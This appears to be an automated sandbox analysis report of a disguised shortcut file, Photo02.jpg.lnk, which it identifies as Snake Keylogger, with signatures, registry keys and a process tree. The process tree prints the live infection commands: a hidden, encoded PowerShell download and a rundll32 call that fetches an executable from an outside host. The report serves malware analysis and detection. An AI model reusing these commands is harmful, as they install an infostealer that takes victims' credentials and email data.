Analysis
-
max time kernel
142s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
Image012.png.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Image012.png.lnk
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Photo01.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Photo01.jpg.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Photo02.jpg.lnk
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Photo02.jpg.lnk
Resource
win10v2004-20231215-en
General
-
Target
Photo02.jpg.lnk
-
Size
2KB
-
MD5
a9c696e8139ba0cfdf3241131fff2d1e
-
SHA1
0607510c26a987944ad5a7da23ebaa69a21e70ed
-
SHA256
fcb534128c207ff3e66cadc7e6400ce3987374d151aac8e7aa741aadd6a70a88
-
SHA512
b933fa80f6eb65be5bb05d8cb8e3ebfbe8c97cad970271d7674d33a72bc8426a20ce17be698f35fcc75592dd479bb80579ceee2454ee4af1c80c616b84cd57ad
Malware Config
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 20 IoCs
resource yara_rule behavioral6/memory/4064-42-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-44-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-45-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-46-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-48-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-50-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-52-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-54-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-58-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-63-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-65-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-66-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-69-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-70-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-72-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-62-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-74-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/4064-77-0x00000000007B0000-0x00000000008B0000-memory.dmp family_snakekeylogger behavioral6/memory/2448-78-0x0000000000400000-0x000000000042B000-memory.dmp family_snakekeylogger behavioral6/memory/2448-85-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 448 powershell.exe 18 3416 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4064 jertrs[1].exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4064 set thread context of 2448 4064 jertrs[1].exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 804 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 2996 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" rundll32.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\MuiCache rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache rundll32.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix rundll32.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 448 powershell.exe 448 powershell.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe 2448 regasm.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4064 jertrs[1].exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 2996 taskkill.exe Token: SeDebugPrivilege 2448 regasm.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2156 rundll32.exe 3416 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4064 jertrs[1].exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4956 wrote to memory of 4172 4956 cmd.exe 85 PID 4956 wrote to memory of 4172 4956 cmd.exe 85 PID 4172 wrote to memory of 448 4172 cmd.exe 86 PID 4172 wrote to memory of 448 4172 cmd.exe 86 PID 448 wrote to memory of 4404 448 powershell.exe 87 PID 448 wrote to memory of 4404 448 powershell.exe 87 PID 4404 wrote to memory of 4184 4404 cmd.exe 89 PID 4404 wrote to memory of 4184 4404 cmd.exe 89 PID 4404 wrote to memory of 2156 4404 cmd.exe 90 PID 4404 wrote to memory of 2156 4404 cmd.exe 90 PID 2156 wrote to memory of 5080 2156 rundll32.exe 91 PID 2156 wrote to memory of 5080 2156 rundll32.exe 91 PID 4404 wrote to memory of 1424 4404 cmd.exe 94 PID 4404 wrote to memory of 1424 4404 cmd.exe 94 PID 4404 wrote to memory of 3416 4404 cmd.exe 96 PID 4404 wrote to memory of 3416 4404 cmd.exe 96 PID 1424 wrote to memory of 5020 1424 cmd.exe 97 PID 1424 wrote to memory of 5020 1424 cmd.exe 97 PID 1424 wrote to memory of 804 1424 cmd.exe 98 PID 1424 wrote to memory of 804 1424 cmd.exe 98 PID 1424 wrote to memory of 2996 1424 cmd.exe 103 PID 1424 wrote to memory of 2996 1424 cmd.exe 103 PID 4404 wrote to memory of 4048 4404 cmd.exe 105 PID 4404 wrote to memory of 4048 4404 cmd.exe 105 PID 4404 wrote to memory of 820 4404 cmd.exe 106 PID 4404 wrote to memory of 820 4404 cmd.exe 106 PID 820 wrote to memory of 4064 820 conhost.exe 107 PID 820 wrote to memory of 4064 820 conhost.exe 107 PID 820 wrote to memory of 4064 820 conhost.exe 107 PID 4064 wrote to memory of 2448 4064 jertrs[1].exe 108 PID 4064 wrote to memory of 2448 4064 jertrs[1].exe 108 PID 4064 wrote to memory of 2448 4064 jertrs[1].exe 108 PID 4064 wrote to memory of 2448 4064 jertrs[1].exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g2⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\system32\DeviceCredentialDeployment.exeDEVIcECRedentIALdEPLOymEnt5⤵PID:4184
-
-
C:\Windows\system32\rundll32.exeRUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 85⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:00000000000000006⤵
- Modifies registry class
PID:5080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT5⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\DeviceCredentialDeployment.exedEvicEcredeNTiAldEPlOYMeNT6⤵PID:5020
-
-
C:\Windows\system32\timeout.exetimEout /T 7 /nObREAK6⤵
- Delays execution with timeout.exe
PID:804
-
-
C:\Windows\system32\taskkill.exeTAskkilL.Exe /F /Im rUNdlL32.exE6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
-
C:\Windows\system32\rundll32.exerundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe5⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
PID:3416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B5⤵PID:4048
-
-
C:\Windows\system32\conhost.exeCoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe5⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exeC:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"7⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2448
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD5b07832ec5f73ae5f2888ebab2aa5283a
SHA1cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA5127a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
552B
MD5885e4bf9c36d1964f751bca33e898503
SHA14055100dda8ee3845cfda6735900c556d8c19ca1
SHA2565efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA5125da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3
-
Filesize
88B
MD539aceb0c8a015a4e8f66498e03ff16db
SHA14707695dece3a70bfbe55868d059a22e4325eaf0
SHA2567eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA5120cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc